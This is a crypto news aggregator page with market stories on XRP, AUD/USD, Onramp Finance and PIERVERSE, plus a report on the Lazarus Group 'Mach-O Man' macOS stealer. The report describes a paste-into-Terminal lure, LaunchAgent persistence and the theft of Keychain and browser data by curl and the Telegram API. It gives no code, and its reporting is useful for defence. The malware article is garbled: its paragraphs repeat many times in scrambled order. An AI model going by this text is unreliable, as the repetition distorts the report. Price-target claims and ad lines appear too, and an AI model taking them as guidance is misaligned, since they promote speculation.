hodler

22 Apr 2026, 13:07

Can XRP score a 127% price jump? Analyst shares why XRP’s funding rate positioning could make this possible

An analyst is drawing attention to persistently negative funding rates for XRP on Binance as a potential precursor to a sharp price reversal, one that could deliver gains of up to 127% if historical patterns repeat. Since the start of 2026, funding rates on the exchange have remained negative for most of the period. Analyst

22 Apr 2026, 12:45

AUD/USD Analysis: BNY Reveals Critical Shift as Growth Index Softens While Capital Flows Turn Supportive

BitcoinWorld AUD/USD Analysis: BNY Reveals Critical Shift as Growth Index Softens While Capital Flows Turn Supportive Financial markets are closely monitoring the Australian dollar against the US dollar as BNY Mellon’s latest analysis reveals a complex dynamic: while Australia’s growth index shows softening signals, supportive capital flows are creating unexpected resilience in the AUD/USD pair. This development comes amid shifting global monetary policies and commodity market volatility that continues to influence currency valuations worldwide. AUD/USD Faces Diverging Economic Signals BNY Mellon’s research team published their quarterly currency analysis this week, highlighting contradictory forces affecting the Australian dollar. The growth index, which measures multiple economic indicators, registered a decline of 0.8% in the latest quarter. However, capital flows into Australian assets increased by approximately 3.2% during the same period. This divergence creates what analysts describe as a “tug-of-war” scenario for the currency pair. Market participants are particularly attentive to these developments because the Australian dollar serves as a proxy for global risk sentiment and commodity demand. The Reserve Bank of Australia’s monetary policy decisions continue to influence the currency’s trajectory. Furthermore, US Federal Reserve policies create additional pressure on the exchange rate through interest rate differentials. Understanding the Growth Index Components The growth index referenced by BNY incorporates several key metrics: Manufacturing PMI: Australia’s manufacturing sector showed contraction for the second consecutive month Retail Sales: Consumer spending growth slowed to 0.2% month-over-month Employment Data: Unemployment rate edged up to 4.1% despite job creation Business Confidence: Survey results indicated declining optimism among Australian firms These indicators collectively suggest economic headwinds that typically pressure currency valuations. However, the Australian dollar has demonstrated remarkable stability against this backdrop. Market analysts attribute this resilience to structural factors within Australia’s economy and shifting global investment patterns. Capital Flows Provide Unexpected Support Despite softening growth indicators, capital flows tell a different story. Foreign investment in Australian government bonds reached $4.2 billion in the latest reporting period. Additionally, equity inflows totaled $1.8 billion, primarily targeting the mining and renewable energy sectors. These movements reflect continued international confidence in Australia’s long-term economic prospects. The commodity sector remains a crucial driver of these capital flows. Australia’s position as a leading exporter of iron ore, lithium, and natural gas continues to attract investment. Global demand for these resources, particularly from Asian markets, supports the Australian dollar through trade balances and investment channels. Recent AUD/USD Performance Indicators Indicator Current Value Previous Quarter Year-over-Year Change Exchange Rate 0.6580 0.6520 +0.9% Trade Balance +$7.4B +$6.8B +8.8% Foreign Investment +$6.0B +$5.2B +15.4% Interest Rate Differential -1.25% -1.50% Narrowing Expert Perspectives on Currency Dynamics Financial institutions are analyzing these developments through different lenses. BNY’s currency strategists emphasize that traditional growth indicators may not fully capture Australia’s economic transformation. The transition toward renewable energy exports and technology services creates new valuation metrics for the Australian dollar. Consequently, investors are increasingly looking beyond conventional economic data when making currency allocation decisions. Meanwhile, other analysts point to technical factors supporting the AUD/USD pair. The currency’s correlation with copper prices remains strong at 0.72, while its relationship with gold prices has strengthened to 0.65. These commodity linkages provide natural support during periods of global uncertainty. Additionally, Australia’s fiscal position remains relatively strong compared to other developed economies, enhancing its appeal to international investors. Global Context and Comparative Analysis The AUD/USD dynamics occur within a broader global currency landscape. The US dollar index has shown volatility as markets assess Federal Reserve policy signals. Meanwhile, other commodity currencies like the Canadian dollar and New Zealand dollar face similar crosscurrents. Australia’s unique position in Asian supply chains and energy transitions creates distinct advantages for its currency. Regional economic developments also influence the Australian dollar’s performance. China’s economic recovery pace directly impacts Australian exports, while Southeast Asian growth patterns affect investment flows. The relative stability of Australia’s political and regulatory environment continues to attract capital despite short-term economic softness. This structural advantage may explain the divergence between growth indicators and currency performance. Risk Factors and Future Scenarios Several risk factors could alter the current dynamics. A sharper-than-expected slowdown in China would negatively impact Australian exports. Additionally, renewed US dollar strength driven by Federal Reserve policy could pressure the AUD/USD pair. Domestic factors including housing market developments and consumer debt levels also warrant monitoring. Market participants are preparing for multiple scenarios. The baseline projection suggests range-bound trading with support around 0.6500 and resistance near 0.6700. However, significant moves could occur if either growth indicators deteriorate further or capital flows accelerate unexpectedly. Technical analysis indicates key support levels at 0.6480 and 0.6420, while resistance appears at 0.6650 and 0.6720. Conclusion The AUD/USD currency pair presents a complex picture as BNY’s analysis reveals softening growth indicators alongside supportive capital flows. This divergence highlights the multidimensional nature of currency valuation in contemporary markets. While traditional economic metrics suggest headwinds for the Australian dollar, structural factors and investment patterns provide countervailing support. Market participants must consider both sets of factors when assessing the AUD/USD outlook. The currency’s performance will likely continue reflecting this tension between short-term economic data and long-term investment themes. FAQs Q1: What does BNY’s analysis reveal about the AUD/USD currency pair? BNY’s analysis shows the Australian dollar faces conflicting signals: economic growth indicators are softening while capital flows into Australian assets remain supportive, creating a complex dynamic for the AUD/USD exchange rate. Q2: Why are capital flows supporting the AUD despite softening growth? Capital flows remain supportive due to Australia’s strong commodity export position, particularly in critical minerals and energy, along with relative political stability and attractive yield differentials compared to other developed markets. Q3: How does the US Federal Reserve policy affect AUD/USD? Federal Reserve policy influences AUD/USD through interest rate differentials, risk sentiment, and global dollar liquidity. Tighter US monetary policy typically pressures the Australian dollar, while easier policy provides support. Q4: What are the main components of Australia’s growth index? The growth index includes manufacturing PMI, retail sales data, employment figures, business confidence surveys, and other economic indicators that collectively measure economic expansion or contraction. Q5: How do commodity prices influence the Australian dollar? Commodity prices significantly influence the AUD because Australia is a major exporter of iron ore, coal, natural gas, and critical minerals. Higher commodity prices generally support the Australian dollar through improved trade balances and increased investment flows. This post AUD/USD Analysis: BNY Reveals Critical Shift as Growth Index Softens While Capital Flows Turn Supportive first appeared on BitcoinWorld .

22 Apr 2026, 12:31

Onramp Launches New Bitcoin Finance Platform for BTC-Native Services

Onramp, the Austin-based bitcoin custody and advisory firm, launched Onramp Finance on April 21, 2026, a unified platform combining cash management, bitcoin brokerage across all 50 states, bitcoin IRAs, direct gold ownership, and a spending card into a single interface. The core question the launch raises: as institutional Bitcoin demand continues to accelerate , is the real infrastructure gap not custody or price exposure, but the fragmented financial rails surrounding long-term BTC holders? Key Takeaways: Platform launch: Onramp Finance went live April 21, 2026, consolidating banking, brokerage, custody, and retirement into one interface. Yield and rewards: Cash accounts offer up to 5% rewards funded by Onramp; spending card returns up to 1.5% cash back. Custody infrastructure: Multi-provider model spans BitGo, Coinbase, Coincover, and Tetra, with insurance through Lloyd’s of London. Genesis Program: Capped at 210 participants; requires a minimum 2 BTC deposit and a qualifying trade of at least $100 within 30 days. Target market: Long-term wealth builders and high-net-worth individuals treating bitcoin as a multi-decade holding, not a speculative trade. Discover: The best crypto to diversify your portfolio with How Onramp Finance Actually Works – and What the Architecture Signals The platform organizes its services around three functions: earning, accumulating, and spending. Users park cash in accounts earning up to 5% in Onramp-funded rewards, discretionary, not guaranteed interest, then route funds into bitcoin or gold, with cash-back rewards from the spending card redeployable into those same asset buckets. Custody sits on a multi-institution model spanning BitGo, Coinbase, Coincover, and Tetra, with Lloyd’s of London providing insurance coverage. That architecture eliminates single-point-of-failure risk that has historically plagued exchange-based custody, a direct structural response to the collapses that defined 2022. Two launches today. One lets you trade 24/7 perpetual futures on anything. One helps you earn on your cash, own bitcoin on the strongest custody architecture ever built, and preserve wealth across decades. The contrast is deafening. Speculation or savings. Pick your platform. https://t.co/3VgY0o12d0 pic.twitter.com/4FxOyOWyTP — Michael Tanguma (@MTanguma) April 21, 2026 The Genesis Program layers early-adopter incentives on top: no-fee custody vault for one year, early product access, and direct contact with company leadership, all for a minimum 2 BTC deposit and a qualifying $100 trade within 30 days. Slots fill in trade-execution order, capped at 210 participants. CEO Michael Tanguma framed the launch around long-horizon wealth principles rather than market timing. His position is unambiguous: “Sound financial planning has always rested on a few simple ideas. Live on less than you make. Put the rest into things that hold their value. Pass them on intelligently.” That framing matters – it signals Onramp is explicitly not competing for the active-trader segment. Discover: The best pre-launch token sales The post Onramp Launches New Bitcoin Finance Platform for BTC-Native Services appeared first on Cryptonews .

22 Apr 2026, 12:14

North Korea’s Lazarus Group launches new malware kit targeting macOS users in crypto, fintech

The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to go against crypto companies, fintech organizations, and key execs using Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to go against crypto companies, fintech organizations, and key execs using Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. The crypto card with no spending limits. Get 3% cashback and instant mobile payments. Claim your Ether.fi card.

22 Apr 2026, 12:13

Can the $100K PIERVERSE Binance competition spark recovery?

PIERVERSE (PIER) has seen sharp volatility over the past few days, transitioning from a strong rally into a correction before stabilising in a recovery range. The price swings followed market reaction to earlier speculation and the launch of a new trading competition. The token initially surged from $0.429 to a peak of $1.49, before reversing sharply. It has since stabilised around $0.9311, indicating a partial recovery after the pullback, though volatility remains elevated. Sharp rally followed by aggressive correction The first major move in PIERVERSE came when the token climbed rapidly from $0.429 to $1.49. The rally unfolded in a short timeframe and was driven by intense speculative inflows and its listing on Upbit , one of the largest cryptocurrency exchanges in South Korea. That listing triggered a significant repricing phase, culminating in an all-time high of $1.49 on April 20, 2026. However, the move was short-lived. Once the price reached its peak, selling pressure increased sharply, leading to a near-full retracement of the advance. PIERVERSE dropped back toward the $0.69 region, effectively erasing most of the rally gains in a single corrective phase. This type of price action is typically seen when early buyers and short-term traders exit positions after a fast upward move, especially in markets where liquidity is concentrated around event-driven speculation rather than steady accumulation. Despite the steep correction, the token did not continue lower for long. Bulls gradually returned to the market, helping stabilise the price near the $0.90 region, where it currently trades around $0.926. $100K trading competition adds a second wave of activity Binance Wallet has launched the Pieverse Protocol Trading Competition on Binance Alpha, and during the promotion periods, users can trade PIEVERSE in their Binance Wallet (Keyless) or via Binance Alpha to receive exclusive token rewards. Since the competition began, trading volume has remained elevated, with daily activity exceeding $115 million at press time. This level of turnover reflects strong participation from traders responding to incentives rather than passive holding behaviour. The competition has helped prevent a deeper decline after the correction, instead pushing the market into a tighter consolidation range between approximately $0.86 and $0.98. While it has not created a new breakout, it has clearly increased liquidity and reduced downward pressure in the short term. Market behaviour shows ongoing consolidation after volatility The current price structure suggests that PIERVERSE is still working through a post-expansion stabilisation phase. After moving from $0.429 to $1.49, and then correcting sharply, the market is now attempting to form a temporary base above the $0.90 level. Trading activity remains elevated, but direction remains uncertain. Although the $100K competition has helped 